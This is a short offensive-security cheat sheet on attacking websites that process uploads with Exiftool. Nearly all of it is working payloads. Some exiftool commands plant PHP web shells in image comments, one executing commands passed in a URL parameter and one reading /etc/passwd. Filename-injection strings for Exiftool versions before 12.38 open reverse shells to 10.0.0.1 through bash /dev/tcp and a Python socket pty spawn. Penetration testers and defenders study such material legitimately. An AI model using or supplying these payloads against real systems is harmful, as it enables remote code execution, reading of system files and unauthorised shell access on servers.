File Upload Attack on Exiftool

If website uses Exiftool to analyze uploaded files, we might be able to exploit the vulnerabilities.

Polyglot Attack

We might be able to execute remote code by polyglotting the original plain image file.
At first, create a blank image file as below, but this step may be not required if you already have some image file.

convert -size 32x32 xc:white test.jpg

Then insert OS command with exiftool.

exiftool -Comment="<?php system('ls'); ?>" example.png
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' exploit.png
exiftool -Comment="<?php echo 'START ' . file_get_contents('/etc/passwd') . ' END'; ?>" example.jpg -o polyglot.php



Command Injection (version < v12.38)

On Exiftool version lower than 12.38, we can inject OS command in the filename when uploading.

# Ping
filename="touch test; ping -c 1 10.0.0.1 |"

# Reverse shell
filename="touch test; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 |"
filename="touch test; bash -c \"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\" |"
filename="touch test; python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"10.0.0.1\", 1234));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")' |"